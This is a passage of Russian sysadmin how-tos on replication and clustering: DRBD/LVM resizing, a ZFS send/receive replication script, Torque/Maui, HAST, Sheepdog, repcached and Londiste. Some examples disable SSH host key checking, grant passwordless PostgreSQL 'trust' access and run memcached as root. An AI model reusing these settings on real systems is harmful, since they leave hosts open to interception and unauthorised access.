512B 2147MB 2147MB primary lvm (parted) quit Information: You may need to update /etc/fstab. deimos:~# Для создания физического тома LVM и включения его в необходимую группу томов используем команды: pvcreate /dev/sdc vgextend Data /dev/sdc Расширение файловых систем виртуальных окружений Для расширения файловой системы конкретного виртуального окружения следует последовательно выполнить три операции: 1.Увеличить размер тома LVM 2.Расширить том DRBD 3.Расширить файловую систему Все три операции могут быть выполнены без приостановки сервисов кластера, однако должны выполняться строго при наличии в составе кластера двух работоспособных узлов. Увеличение размера тома LVM выполняется на обоих узлах кластера командой lvextend. Пример увеличения размера тома LVM виртуального окружения db на 1 Гбайт: На сервере phobos lvextend -L+1G /dev/VGroup00/db На сервере deimos lvextend -L+1G /dev/VGroup00/db Операция расширения тома DRBD выполняется синхронно на обоих узлах кластера, и должна инициироваться выполнением команды drbdadm resize. Данная команда должна быть выполнена на узле кластера, являющемся основным (primary) для соответствующего тома. Пример выполнения команды (в нашем случае - на сервере deimos): drbdadm resize db Выполнение данной команды приведёт к началу синхронизации между узлами добавленного пространства логического тома, прогресс синхронизации можно отследить по содержимому файла /proc/drbd. Расширение файловой системы производится путём выполнения команды resize2fs. Данная команда также должна быть выполнена на узле кластера, являющемся основным (primary) для соответствующего тома, и может выполняться без размонтирования файловой системы. Пример выполнения команды (в нашем случае - на сервере deimos): resize2fs /dev/drbd0

Непрерывная репликация ZFS во FreeBSD Автор: Алексей Волков [комментарии]

Введение С самого начала появления ZFS, я записался в ряды ее поклонников, и до сих пор ни разу не пожалел об этом. И на страницах opennet.ru я уже успел поделиться приятными моментами ее использования на OS FreeBSD. Сегодня речь пойдет о возможностях непрерывной репликации ZFS между хостами FreeBSD. Цели Лично мне это стало не просто полезным, а необходимым, как только возникла задача использования виртуальных окружений, и в рамках одного физического сервера создавалась группа виртуальных серверов. Первоначальная задумка выглядела следующим образом: * Основной сервер виртуализации * Сервер горячей замены (по своим характеристикам близкий, но не идентичный основному) * Коммерческое ПО для виртуализации, не предполагалось, только OpenSource. Задача абсолютной бесперебойной работы не ставилась, основной критерий - быстрое (в пределах 5 минут) время восстановления IT сервисов в случае отказа основного сервера, с минимальной потерей пользовательских данных. Другими словами, если основной сервер выходит из строя, то все данные пользователей, сохраненные за несколько минут до отказа, не должны быть утеряны. Вариант с общим NAS, разделяемый между серверами виртуализации, по ряду причин, в том числе и финансовых, так же не рассматривался. Таким образом, данную конфигурацию можно кратко охарактеризовать, как среда виртуализации начального уровня с элементами отказоустойчивости. Средства В качестве хост системы выступает FreeBSD 8.1 с гипервизором VirtualBox OSS. Я не буду подробно останавливаться на процессе установки и настройки VirtualBox, скажу только то, что оба сервера и основной и резервный имеют идентичное ПО, а все конфигурации и образы виртуальных серверов расположены внутри ZFS с точкой монтирования /var/IMAGES. В таком виде, задача обеспечения отказоустойчивости сводится к синхронизации содержимого /var/IMAGES с основного сервера на резервный, чтобы в случае отказа, оставалась возможность запуска всех серверов на резервном сервере из актуальных образов. Очевидным является тот факт, что чем чаще происходит синхронизация, тем лучше. Так же очевидно что rsync, не смотря на все его прелести, не способен обеспечить синхронизацию заданными выше временными рамками. Беглый поиск выявляет упоминания о коммерческих реализациях zfs репликации а так же стандартных возможностях ZFS создания, и что самое важное, обмена ими между хостами посредством zfs send/receive. Об этом упоминалось, в том числе и на страницах opennet. Именно zfs send/receive будет использован для непрерывной репликации в режиме близкому к реальному времени. Репликацией должен заниматься скрипт, запускаемый из cron, интервал запуска 1 минута. Скрипт запускается на резервном сервере и должен: * Создать новый снапшот на основном сервере. * Все снапшоты, задействованные в процессе репликации, должны иметь некую отличительную особенность (префикс в своем имени). * Выявить самый свежий общий снапшот, относительно которого, можно провести инкрементальную репликацию. В случае его отсутствия провести полную репликации. * Провести репликацию через send/receive * Удалить неиспользуемые снапшоты. * Запротоколировать все свои действия. Как видно из краткого плана мероприятий, резервному серверу придется запускать команды на основном. SSH замечательно справиться с этим, но нужно иметь ввиду что: * запускать через скрипт команды на удаленном сервере от имени рута ( а значит хранить или пароль или ключ рута) не слишком хорошая идея. * ZFS на FreeBSD до сих пор не дружит с ZFS Delegated Administration Учитывая эти два факта, следует завести на основном сервере на привилегированного пользователя и выполнять команды zfs через sudo , разрешив ему необходимый минимум. В файле /usr/local/etc/sudoers.d/zfs_replication определяем для пользователя следующие разрешения synczfs ALL = NOPASSWD : /sbin/zfs snapshot *, /sbin/zfs send *,/sbin/zfs list *,/sbin/zfs destroy * А теперь непосредственно скрипт /root/zfs-nrt-replication.sh #!/bin/sh REMOTE_HOST="master.local" FS="/var/IMAGES" REMOTE_POOL="tank0" LOCAL_POOL="tank0" SNAPSHOTMARK="SYNC-" SSHKEY="/root/syncimages_id" SSHFLAGS="-i $SSHKEY -o CheckHostIP=no -o StrictHostKeyChecking=no \ -o IdentitiesOnly=yes -o BatchMode=yes -o GlobalKnownHostsFile=/dev/null -l synczfs" SSHCMD="/usr/bin/ssh $SSHFLAGS $REMOTE_HOST sudo " INCREMENTAL="" ( echo "Snapshoting remote FS" $SSHCMD "zfs snapshot -r $REMOTE_POOL$FS@$SNAPSHOTMARK`uuidgen`" RECENT_COMMON_SNAPSHOT="" for R in `$SSHCMD zfs list -H -o name -s creation -t snapshot -r $REMOTE_POOL$FS | grep $REMOTE_POOL$FS@` do for L in `zfs list -H -o name -s creation -t snapshot -r $LOCAL_POOL$FS | grep $LOCAL_POOL$FS@` do if [ "${R##*@}" = "${L##*@}" ]; then RECENT_COMMON_SNAPSHOT=${R##*@} INCREMENTAL="-I $REMOTE_POOL$FS@$RECENT_COMMON_SNAPSHOT" fi done REMOTE_LATEST_SNAPSHOT=${R##*@} done echo "Syncronizing remote FS to local" echo "zfs send -R $INCREMENTAL $REMOTE_POOL$FS@$REMOTE_LATEST_SNAPSHOT" $SSHCMD "zfs send -R $INCREMENTAL $REMOTE_POOL$FS@$REMOTE_LATEST_SNAPSHOT" | \ /usr/local/bin/pipemeter --autooff --blocksize 16M --interval 60 --log | zfs receive -dF $LOCAL_POOL if [ $? -eq 0 ]; then echo "Cleaning useless remote snapshots" $SSHCMD "zfs list -r -t snapshot -o name -H $REMOTE_POOL$FS | grep \"$SNAPSHOTMARK\" | \ egrep -v \"@($RECENT_COMMON_SNAPSHOT|$REMOTE_LATEST_SNAPSHOT)\" | xargs -I% sudo zfs destroy %" fi echo "Done." ) 2>&1 | logger -s -p ftp.info -t SYNCZFS Сам скрипт запускается на резервном сервере из cron следующим образом */1 * * * * root /usr/sbin/daemon -p /var/run/zfs-sync.pid -f /root/zfs-nrt-replication.sh > /dev/null Итак, на резервном сервере скрипт запускается каждую минуту, но если он еще не закончил свое выполнение с прошлого запуска, то попытка пропускается. Весь вывод скрипта направляется в лог-файл /var/log/xferlog. Для более наглядной оценки скорости используется дополнительное ПО pipemeter, в результате чего в лог файл, с минутным интервалом, добавляется информация об объеме передаваемых данных, а так же скорости обмена. Дополнительно, можно настроить автоматический снапшотинг, чтобы иметь версии виртуальных машин различной степени давности (часовой, дневной, недельной и т.д.). Эти версии так же будут реплицироваться на резервный сервер. И теперь, в случае обнаружения отказа в работе основного сервера, администратору остается запустить виртуальную машину на резервном сервере, но и этот процесс так же можно автоматизировать, но это материал еще для одной статьи :)

Настройка вычислительного кластера на базе torque/maui (доп. ссылка 1) Автор: Sergey Korablin [комментарии]

Цель: объединить несколько серверов в один вычислительный кластер, предоставить пользователям простой способ запуска вычислительных задач не конфликтуя друг с другом. Для этого необходимы несколько серверов под управлением Linux(ниже описывается установка на RedHat), быстрый канал между серверами, ПО для организации очереди, вычислительное ПО умеющее распараллеливать вычисление на несколько узлов (например с помощью mpi). Установка и настройка ПО Torque - менеджер ресурсов, отвечает за отслеживание доступного количества ресурсов на узлах кластера и запуск задач. Первым шагом устанавливаем torque на управляющую ноду. Скачиваем исходники с http://www.clusterresources.com. Установка происходит обычным для Linux способом: tar -xzvf torque-2.x.x.tgz cd torque-2.x.x ./configure --prefix=/usr/local make make install или make rpm (во втором случае будет собран rpm пакет который затем можно установить) Копируем скрипты запуска сервера pbs. cp contrib/init.d/pbs_server /etc/init.d/ В файл /var/spool/torque/server_priv/nodes добавляем все узлы нашего кластера и указываем специфичные для этих узлов параметры. Параметры для описания узлов можно добавлять самостоятельно какие вам необходимы: архитектура узла (x86, sparc, ...), способ подключения к сети (ethernet, infiniband, ...) и т.п. Пример: s200 np=4 arch=x86_64 s200-01 np=2 arch=x86_32 s200-02 np=2 arch=x86_32 s200-03 np=4 arch=x86_64 np - количество процессоров на узле. Запускаем pbs сервер /etc/init.d/pbs_server start Создадим одну дефолтную очередь batch на сервере. # qmrg create queue batch set queue batch queue_type = Execution set queue batch resources_default.nodes = 1 set queue batch resources_default.walltime = 01:00:00 set queue batch resources_available.nodect = 999999 set queue batch enabled = True set queue batch started = True set server acl_hosts = s200 set server default_queue = batch set server log_events = 511 set server mail_from = adm set server scheduler_iteration = 600 set server node_check_rate = 150 set server tcp_timeout = 6 set server next_job_number = 21</i> Очередей может быть несколько, задачи можно направлять в разные очереди с помощью списков доступа. Устанавливаем torque на все вычислительные узлы кластера так же как и на управляющий узел, единственное необходим скрипт запуска монитора pbs, а не сервера. cp contrib/init.d/pbs_mon /etc/init.d/ Прописываем на вычислительных узлах в файл /var/spool/torque/mom_priv/config наш pbs сервер: $pbsserver s200 # s200 - указываем управляющий узел $logevent 255 # bitmap of which events to log</i> Запускаем pbs_mon /etc/init.d/pbs_mon start Правильно будет установить и настроить все необходимое ПО на один вычислительный узел, а затем клонировать ее на остальные узлы кластера. Если все сделано правильно, на управляющем узле можно выполнить команду "pbsnodes -a", вывод должен быть примерно следующий: s200 state = free np = 4 ntype = cluster status = opsys=linux,uname=Linux s200 2.6.9-67.0.15.ELsmp #1 SMP Tue Apr 22 13:58:43 EDT 2008 x86_64,sessions=4793 6052 9319,nsessions=3,nusers=2,idletime=7,totmem=16343180kb,availmem=15996556kb,physmem=8150040kb,ncpus=4, loadave=0.00,netload=13384946066,state=free,jobs=,varattr=,rectime=1240470984 s200-01 state = free np = 2 ntype = cluster status = opsys=linux,uname=Linux s200-01 2.6.9-67.0.15.ELsmp #1 SMP Tue Apr 22 13:58:43 EDT 2008 x86_64,sessions=? 0,nsessions=? 0,nusers=0,idletime=153089,totmem=12231176kb,availmem=12080240kb,physmem=4038036kb,ncpus=2,loadave=0.00, netload=251768374518,state=free,jobs=,varattr=,rectime=1240470944 s200-02 state = free np = 2 ntype = cluster status = opsys=linux,uname=Linux s200-02 2.6.9-67.0.15.ELsmp #1 SMP Tue Apr 22 13:58:43 EDT 2008 x86_64,sessions=? 0,nsessions=? 0,nusers=0,idletime=76890,totmem=12231176kb,availmem=12037100kb,physmem=4038036kb,ncpus=2, loadave=0.00,netload=272192353204,state=free,jobs=,varattr=,rectime=1240470956 ... Запустим какую-нибудь задачу на выполнение (для запуска залогинтесь под обычным пользователем, не под root-ом): $ su - testuser $ echo "sleep 20" | qsub 22.s200 Проверим состояние: $ qstat Job id Name User Time Use S Queue ------------------------- ---------------- --------------- -------- - ----- 22.s200 STDIN testuser 0 Q batch Задача будет висеть в очереди но не выполниться, так как у нас не установлен и не настроем менеджер очереди. Вообще torque содержит свой шедулер (pbs_sched), но он имеет ограниченный функционал и настройки. Мы будем использовать более развитый шедулер - Maui. Пока удалим наше задание: $ qdel 22.s200 Установка менеджера очереди Maui Maui занимается тем, что опрашивает torque на предмет наличия свободных ресурсов и задач в очереди которые необходимо выполнить. На основе полученных данных и своих настроек, он принимает решение о запуске какой-либо задачи и посылает команду серверу torque выполнить ее. Maui позволяет гибко настроить различные стратегии заполнения кластера, приоритеты для задач по различным критериям: количеству запрашиваемых ресурсов, принадлежности пользователя к какой-то группе и т.д. Скачиваем исходники с сайта http://www.clusterresources.com/ и устанавливаем на управляющей ноде (теоретически можно установить куда угодно, но чтобы не усложнять установим там же где и сервер torque). Настройка maui производится в файле /usr/local/maui/maui.cfg Большую часть настроек сделает конфигуратор во время установки. Далее для интеграции maui с torque надо указать, что мы используем менеджер ресурсов PBS (torque): RMCFG[S200] TYPE=PBS Получаем примерно следующий минимальный конфиг: SERVERHOST s200 ADMIN1 root RMCFG[S200] TYPE=PBS AMCFG[bank] TYPE=NONE RMPOLLINTERVAL 00:00:30 SERVERPORT 42559 SERVERMODE NORMAL LOGFILE maui.log LOGFILEMAXSIZE 10000000 LOGLEVEL 3 QUEUETIMEWEIGHT 1 BACKFILLPOLICY FIRSTFIT RESERVATIONPOLICY CURRENTHIGHEST NODEALLOCATIONPOLICY MINRESOURCE Запускаем maui: # maui Еще раз запустим тестовую задачу: $ echo "sleep 20" | qsub 23.s200 qstat должна показать, что задача встала в очередь (статус Q), затем статус должен поменяться на R (выполняется) и через 20 секунд задача должна из очереди исчезнуть. Если все прошло так как описано выше - мы в шаге от финала. Остается только прикрутить выполнение полезной задачи к нашему кластеру. PBS скрипты Для запуска задач будем использовать PBS скрипты. PBS-скрипт - это обычный shell скрипт в котором в виде специальным образом оформленных комментариев начинающихся с #PBS можно передать менеджеру ресурсов необходимые параметры, например: количество узлов и процессоров необходимых на задачу, количество оперативной памяти, архитектуру узлов, время расчета и далее скрип и/или программы которые необходимо выполнить на кластере. Оформим тестовую задачу в виде PBS скрипта. $ cat test.pbs #!/bin/sh #PBS -N test #PBS -l nodes=2:ppn=4,walltime=00:00:50 #PBS -m abe #PBS -M testuser@localhost #PBS -V echo "File containing nodes:" echo $PBS_NODEFILE echo "Nodes for computing:" cat $PBS_NODEFILE sleep 20 Значение параметров: * -N - название задания, носит информативный характер * -l - список ресурсов необходимых для выполнения вычисления * -m - в каких случаях слать пользователю почтовое уведомдение (a - задача отменена, b - задача начала выполняться, e- задача завершена). * -M - на какой ящик отправлять уведомления. * -V - экспортировать переменные окружения в скрипт. запуск задания: $ qsub test.pbs При выполнении этого скрипта доступна одна важная переменная окружения устанавливаемая менеджером ресурсов, это $PBS_NODEFILE. Переменная содержит путь к файлу со списком узлов которые выделены нам для расчета в соответствии с нашими запросами. Далее в зависимости от того как наше ПО производит распараллеливание - обрабатываем в своем скрипте $PBS_NODEFILE и запускаем необходимый расчет указывая свой программе на каких узлах и сколько процессоров она может использовать. Правильно будет вынести все эти вычисления в отдельный скрипт доступный пользователям для запуска, который будет вызываться пользователями из своих PBS скриптов. Пример: #!/bin/bash #PBS -N test_2 #PBS -l nodes=2:ppn=4,walltime=00:00:50 #PBS -m abe #PBS -M testuser@localhost #PBS -V #тут пользователь может установить свои переменные окружения необходимые для вычисления, например путь к данным export DATADIR='/home/testuser/data' ... #запускаем скрипт/программу которая обработает переменные и запустит вычисление на нужных узлах /data/bin/my_super_programm

Создание отказоустойчивых хранилищ во FreeBSD, при помощи HAST (доп. ссылка 1) Автор: mef [комментарии]

Введение. HAST (Highly Avalible Storage) технология позволяющая создавать отказоустойчивые хранилища (Primary-Secondary) используя несколько машин. Эта технология может помочь при создании кластера высокой доступности (HA). HAST появился в FreeBSD начиная с 8.1. В текущей версии HAST можно использовать только две машины. HAST работает на уровне блоков и не зависит от файловой системы, т.е. можно использовать ZFS или UFS. Эта технология работает по TCP. Для работы используется демон hastd и утилита для управления hastctl. Использование. Имеем две машины (ноды) host1 192.168.1.2 host2 192.168.1.9 на обоих машинах стоит дополнительный диск ad3. HAST готов к использованию сразу, без дополнительных установок. Для конфигурирования создадим файл /etc/hast.conf resource my { on host1 { local /dev/ad3 remote 192.168.1.9 } on host2 { local /dev/ad3 remote 192.168.1.2 } } т.е. host1 имеет диск ad3 и синхронизируется с 192.168.1.9 (host2), а для host2 соответственно наоборот. Сделайте такой же файл на другой машине. host1# hastctl create my host1# hastd После этого демон должен запустится, проверим, что все работает host1# hastctl status должно выдать вроде этого my: role: init provname: my localpath: /dev/ad3 extentsize: 0 keepdirty: 0 remoteaddr: 192.168.1.2 replication: memsync dirty: 0 bytes [/CODE] Сделаем такие же действия на другой ноде host2# hastctl create my host2# hastd [/CODE] Теперь раздадим роли машинам. Например, host1 будет главным, а host2 - резервным. host1# hastctl role primary my host2# hastctl role secondary my После того, как host2 стал secondary, должна начаться синхронизация. В первый раз она не должна занять много времени. Проверим, что все работает. host1# hastctl status my: role: primary provname: my localpath: /dev/ad3 extentsize: 2097152 keepdirty: 0 remoteaddr: 192.168.1.9 replication: memsync status: complete dirty: 0 bytes Для нас важно, чтобы был статус complete. Если статус другой, проверяем, что не так. Теперь создадим файловую систему. Не смотря на то что можно использовать UFS лучше использовать ZFS, чтобы не приходилось запускать fsck. Создадим пул используя появившееся устройство /dev/hast/my host1# zpool create mydisk /dev/hast/my host1# zpool list NAME SIZE USED AVAIL CAP HEALTH ALTROOT mydisk 95G 84.5K 95G 0% ONLINE - На второй машине этого делать не надо. HAST настроен. Тестирование. Создадим несколько файлов в mydisk и протестируем нашу систему. Для тестирования перезагрузим ноду с primary, т.е. host1. После перезагрузки посмотрим состяние пула host1# zpool list NAME SIZE USED AVAIL CAP HEALTH ALTROOT mydisk - - - - FAULTED - Это случилось потому что пропало устройство /dev/hast/my Экспортируем пул и поменяем роль host1 на secondary host1# zpool export -f my host1# hastctl role secondary my А host2 сделаем основным и импортируем пул. host2# hastctl role primary my host2# zpool import -f mydisk host2# zpool list NAME SIZE USED AVAIL CAP HEALTH ALTROOT mydisk 95G 84.5K 95G 0% ONLINE - Проверим наши файлы, они должны остаться. Ошибки. По умолчанию логи можно посмотреть в /var/log/message. В результате некоторых действий можно добиться ситуации, когда вы обнаружите в логах запись Split brain - разделение сознания. Это означает, что каждая из нод думает, что она главная и живет собственной жизнью. Такое может произойти если вы умудритесь записать разную информацию на нодах или поставить обои машины в роль primary. Исправить эту ситуацию можно выбрав ту машину которая будет у вас secondary, и нужно сделать на ней: hastctl role init my hastctl create my hastctl role secondary my После этого должен запуститься процесс синхронизации. Он может занять продолжительное время. Автоматизация. Эта система сделана для кластеризации, а именно для кластера высокой доступности. Например можно воспользоваться CARP чтобы сделать постоянным. Можно написать собственные скрипты, а можно воспользоваться стандартными. Автором HAST уже написаны готовые скрипты которые умеют определять на какой ноде сейчас primary. Для работы следует установить ucarp: cd /usr/ports/net/ucarp make && make install clean && rehash Скрипты находятся в /usr/share/expamles/hast/ Скопируйте их в /домашний каталог/sbin/hastd/ так предлагается по умолчанию и отредактируйте переменные в начале скриптов ucarp.sh, ucarp_down.sh, ucarp_up.sh Сделайте это на обоих нодах и запустите ucarp.sh на обоих нодах. Дополнительные возможности. У HAST существует три типа репликаций. Они различаются тем когда данные считаются записанными. * memsync - Данные операции записи считаются завершенными когда запись локальна завершена и когда удаленный узел принял данные, но до того как записать данные. Данные на удаленной ноде начинают писаться, как только отправлен ответ. * fullsync - Данные операции записи считаются завершенными когда запись завершена локально и на удаленной ноде запись тоже завершена. * async - Данные записи считаются завершенными когда запись завершена локально. Это наиболее быстрый способ записи. На момент написания статьи работает только memsync. Дополнительную информацию можно прочитать на http://wiki.freebsd.org/HAST Заключение. HAST только появился, у него богатые возможности для организации хранилища высокой доступности. В данный момент еще не все работает, но это хорошее начало для кластеризации на FreeBSD. Перед тем как работать с HAST в боевых условиях рекомендую потренироваться. У меня были ситуации, когда secondary не хотел брать данные с primary, было что неаккуратные движения приводили к "Split Brain". Данные, правда, потеряны не были, но много времени было потеряно на синхронизации.

Запуск виртуальных машин Qemu и KVM в распределенном хранилище Sheepdog (доп. ссылка 1) [комментарии]

Пример настройки Sheepdog в Fedora Linux для организации выполнения в Qemu или KVM виртуального окружения поверх распределенного на несколько машин высоконадежного хранилища Sheepdog (подробнее см. https://www.opennet.ru/27251/ ) Устанавливаем и запускаем кластерный движок Corosync (http://www.corosync.org/) на всех узлах кластера хранения: yum install corosync service corosync start После интеграции sheepdog-драйвера в состав пакета qemu и qemu-kvm, достаточно будет выполнить: yum install qemu-kvm (сейчас еще нужно собирать драйвер из исходных текстов) Запускаем на каждом узле кластера хранения управляющий процесс Sheepdog, передав в качестве аргумента директориею для хранения объектов в локальной ФС каждого узла: sheep /store Форматируем и настраиваем параметры кластера хранения, указываем дублирование каждого блока данных на три разных узла: collie cluster format --copies=3 Создаем в распределенном хранилище дисковый образ, размером 256Гб, для виртуальной машины с именем Alice: qemu-img create sheepdog:Alice 256G Импортируем существующий образ виртуальной машины в распределенное хранилище с именем Bob: qemu-img convert ~/amd64.raw sheepdog:Bob Смотрим список активных хранилищ: collie vdi list Bob 0 2.0 GB 1.6 GB 0.0 MB 2010-03-23 16:16 80000 Alice 0 256 GB 0.0 MB 0.0 MB 2010-03-23 16:16 40000 Запускаем виртуальную машину: qemu-system-x86_64 sheepdog:Alice Создаем снапшот виртуальной машины Alice: qemu-img snapshot -c name sheepdog:Alice Параллельно запускаем созданный снапшот: qemu-system-x86_64 sheepdog:Alice:1 Клонируем снапшот Alice:1 в новую виртуальную машину Charlie qemu-img create -b sheepdog:Alice:1 sheepdog:Charlie Просматриваем состояние узлов кластера: collie node list

Организация мульти-мастер репликации двух memcached-серверов (доп. ссылка 1) [комментарии]

Для организации автоматической репликации данных между двумя серверами memcached (http://memcached.org/) можно использовать набор патчей http://repcached.lab.klab.org/ . Система поддерживает мульти-мастер режим и реплицирует данные в асинхронном режиме, поддерживаются все команды memcached (set, add, delete, incr/decr, flush_all, cas). Например, используя репликацию удобно организовать синхронизированное хранение в memcached номеров пользовательских сессий, при раздельном обслуживании частей сайта несколькими серверами. Ниже представлен пример настройки двух реплицированных memcached-серверов в Debian/Ubuntu. Для работы memcached в PHP подключаем соответствующий модуль и указываем хранить идентификаторы сессий через него: extension=memcache.so session.save_handler = memcache session.save_path = "tcp://192.168.168.61:11211?persistent=1,tcp://192.168.168.62:11211?persistent=1" При такой конфигурации идентификаторы сессий всегда будут сохраняться сразу на двух узлах memcached. Но у такой схемы есть проблемы: если один узел выйдет из строя или будет перезагружен, все ранее сохраненные номера на этом узле сессий будут потеряны. Автоматизировать синхронизацию данных между несколькими memcached-серверами можно при помощи repcached. При этом репликация производится в прозрачном режиме, пользовательские приложения обращаются только к локальному memcached, а всю работу по репликации выполняет repcached, делая это в асинхронном режиме. 1. Копируем исходные тексты repcached c http://repcached.lab.klab.org/ , дополнительно установив пакет libevent-dev, который понадобиться для сборки: # tar xvf memcached-1.2.8-repcached-2.2.tar # cd memcached-1.2.8-repcached-2.2/ # apt-get install libevent-dev checkinstall Компилируем и устанавливаем в /usr/local/bin/memcached: # ./configure --enable-replication # make Устанавливаем через создание пакета вместо make install # checkinstall Формируем опции для запуска, создаем /etc/default/memcachedrep: DAEMON_ARGS="-m 64 -p 11211 -u root -P /var/run/memcachedrep.pid -d -x 192.168.168.2 -X 11212" где 192.168.168.2 - адрес второго сервера, куда следует реплицировать данные, 11212 - номер порта, который будет использоваться для репликации данных. На втором сервере по аналогии прописываем адрес первого сервера. Создаем скрипт для запуска /etc/init.d/memcachedrep: #! /bin/sh ### BEGIN INIT INFO # Provides: memcached # Required-Start: $syslog # Required-Stop: $syslog # Should-Start: $local_fs # Should-Stop: $local_fs # Default-Start: 2 3 4 5 # Default-Stop: 0 1 6 # Short-Description: memcached - Memory caching daemon replicated # Description: memcached - Memory caching daemon replicated ### END INIT INFO # Author: Marcus Spiegel <marcus.spiegel@gmail.com> PATH=/sbin:/usr/sbin:/bin:/usr/bin DESC="memcachedrep" NAME=memcached DAEMON=/usr/local/bin/$NAME DAEMON_ARGS="--options args" PIDFILE=/var/run/memcachedrep.pid SCRIPTNAME=/etc/init.d/$DESC VERBOSE="yes" # Exit if the package is not installed [ -x "$DAEMON" ] || exit 0 # Read configuration variable file if it is present [ -r /etc/default/$DESC ] && . /etc/default/$DESC # Load the VERBOSE setting and other rcS variables . /lib/init/vars.sh # Define LSB log_* functions. # Depend on lsb-base (>= 3.0-6) to ensure that this file is present. . /lib/lsb/init-functions # # Function that starts the daemon/service # do_start() { start-stop-daemon --start --quiet --pidfile $PIDFILE --exec $DAEMON --test > /dev/null \ || return 1 start-stop-daemon --start --quiet --pidfile $PIDFILE --exec $DAEMON -- \ $DAEMON_ARGS \ || return 2 } # # Function that stops the daemon/service # do_stop() { start-stop-daemon --stop --quiet --retry=TERM/30/KILL/5 --pidfile $PIDFILE --name $NAME RETVAL="$?" [ "$RETVAL" = 2 ] && return 2 start-stop-daemon --stop --quiet --oknodo --retry=0/30/KILL/5 --exec $DAEMON [ "$?" = 2 ] && return 2 # Many daemons don't delete their pidfiles when they exit. rm -f $PIDFILE return "$RETVAL" } # # Function that sends a SIGHUP to the daemon/service # do_reload() { start-stop-daemon --stop --signal 1 --quiet --pidfile $PIDFILE --name $NAME return 0 } case "$1" in start) [ "$VERBOSE" != no ] && log_daemon_msg "Starting $DESC" "$NAME" do_start case "$?" in 0|1) [ "$VERBOSE" != no ] && log_end_msg 0 ;; 2) [ "$VERBOSE" != no ] && log_end_msg 1 ;; esac ;; stop) [ "$VERBOSE" != no ] && log_daemon_msg "Stopping $DESC" "$NAME" do_stop case "$?" in 0|1) [ "$VERBOSE" != no ] && log_end_msg 0 ;; 2) [ "$VERBOSE" != no ] && log_end_msg 1 ;; esac ;; restart|force-reload) log_daemon_msg "Restarting $DESC" "$NAME" do_stop case "$?" in 0|1) do_start case "$?" in 0) log_end_msg 0 ;; 1) log_end_msg 1 ;; # Old process is still running *) log_end_msg 1 ;; # Failed to start esac ;; *) # Failed to stop log_end_msg 1 ;; esac ;; *) #echo "Usage: $SCRIPTNAME {start|stop|restart|reload|force-reload}" >&2 echo "Usage: $SCRIPTNAME {start|stop|restart|force-reload}" >&2 exit 3 ;; esac exit 0 Тестируем: На первом узле помещаем ключ в хранилище: $ telnet 127.0.0.1 11211 set foo 0 0 3 bar STORED На втором узле убеждаемся, что ключи реплицировались успешно: telnet 127.0.0.1 11211 get foo VALUE foo 0 3 bar END Далее перезапускаем один из memcached-серверов и по аналогии проверяем, восстановились ли на нем данные.

Установка Londiste, системы асинхронной мастер-слэйв репликации PostgreSQL (доп. ссылка 1) Автор: Sergey Konoplev [комментарии]

Инструкция содержит подробное пошаговое описание процесса настройки репликации на основе Londiste, системы асинхронной мастер-слэйв репликации из пакета SkyTools от Skype. Допустим есть 2 сервера - host1 и host2. На host1 работает кластер с одной или несколькими базами, которые необходимо реплицировать на host2. Другими словами host1 будет мастером, а host2 слейвом. Прежде всего необходимо установить пакет SkyTools. Его исходники можно найти на официальном сайте проекта http://developer.skype.com/SkypeGarage/DbProjects/SkyTools или в wiki http://wiki.postgresql.org/wiki/Skytools . Там же найдёте всю документацию и ссылки на дополнительные материалы. Советую обращаться к ним если захотите узнать дополнительные подробности о вещах, которых я буду в данной статье касаться поверхностно. Итак, всё ПО необходимое для репликации установлено, но, прежде чем начать настройку, хочу рассказать о принципах работы Londiste в очень общих словах. Londiste базируется на механизме очередей PgQ, который тоже входит в пакет SkyTools. Информация об изменениях данных попадает в эти очереди из спец-триггеров, навешиваемых на реплицируемые таблицы. PgQ, в свою очередь, основывается на пакетной обработке и использует так называемый ticker, утилиту (демон), генерирующую события готовности пачек данных. Эти события слушает демон Londiste и по их наступлению переносит пачки с мастера на слейв. Репликация на базе Londiste может работать по схеме - один мастер на несколько слейвов. В связи с этим я буду делать пометки, различающие установку репликации первого слейва и последующих. Также я буду различать репликацию отдельной базы и кластера целиком. Описанный процесс не требует даунтайма. Замечание: В данном описании будут часто встречаются обобщения более узких ситуаций, которые не тестировались во всех возможных вариантах. Так что прежде чем внедрять её в продакшн, тщательно протестируйте ваш процесс. Если вы найдёте какую-нибудь ошибку или не рабочую ситуацию, буду благодарен если сообщите. 1. Первым делом подготовим мастер-сервер 1.1. Права на мастере В данном примере все утилиты будут работать под системным пользователем postgres. Операции с БД я доверю также пользователю postgres (который в базе). Но в реальности будет правильнее сделать отдельного пользователя для этих утилит, смотрите по вашей ситуации. Дадим пользователю postgres доверительный доступ (без пароля) к базам на мастере со слейва. /var/lib/postgres/8.4/data/pg_hba.conf: ... # TYPE DATABASE USER CIDR-ADDRESS METHOD # host2 IP host db1 postgres 192.168.10.2/32 trust .. . Если реплицируются конкретные базы, а не весь комплект, то добавьте такие записи для каждой из них. В случае же репликации всех БД достаточно одной записи, где в колонке DATABASE указываем all. Не забудьте сделать reload серверу. 1.2. Настрока ticker-а Далее создадим файл конфигурации ticker-а. /etc/skytools/db1-ticker.ini: [pgqadm] job_name = db1-ticker db = dbname=db1 # Задержка между запусками обслуживания (ротация очередей и т.п.) в секундах maint_delay = 600 # Задержка между проверками наличия активности (новых пакетов данных) в секундах loop_delay = 0.1 logfile = /var/log/skytools/%(job_name)s.log pidfile = /var/run/skytools/%(job_name)s.pid Создайте подобные конфигурации для каждой реплицируемой базы. 1.3. Запускаем ticker Теперь необходимо инсталлировать служебный код (SQL) и запустить ticker как демона для каждой из баз. Делается это с помощью утилиты pgqadm.py следующими командами: python pgqadm.py /etc/skytools/db1-ticker.ini install python pgqadm.py /etc/skytools/db1-ticker.ini ticker -d Проверим, что в логах (/var/log/skytools/db1-tickers.log) всё нормально. На данном этапе там должны быть редкие записи (раз в минуту). 2. Далее настроим слейв 2.1. Убедимся что Londiste остановлен python londiste.py -s /etc/skytools/db1-londiste.ini Повторите для всех реплицируемых баз. 2.2. Востанавливаем схему базы Замечание: В данном примере подразумевается что целевая система не содержит баз с такими же именами как у реплицируемых. Если реплицируются отдельные базы, то прежде всего необходимо создать пользователей, идентичных тем, которые работали с ними на мастере. Далее переносим схемы этих баз на слейв (повторяем для каждой): pg_dump -s -C -h host1 -U postgres db1 | psql -U postgres 1>db1-restore.stdout 2>db2-restore.stderr Если реплицируем все базы целиком, то достаточно один раз сделать так: pg_dumpall -s -h host1 -U postgres | psql -U postgres 1>all-restore.stdout 2>all-restore.stderr Убедимся, что в лог-файлах *-restore.stderr отсутствуют ошибки кроме "роль postgres уже существует" (ч.г. не могу понять для чего вообще 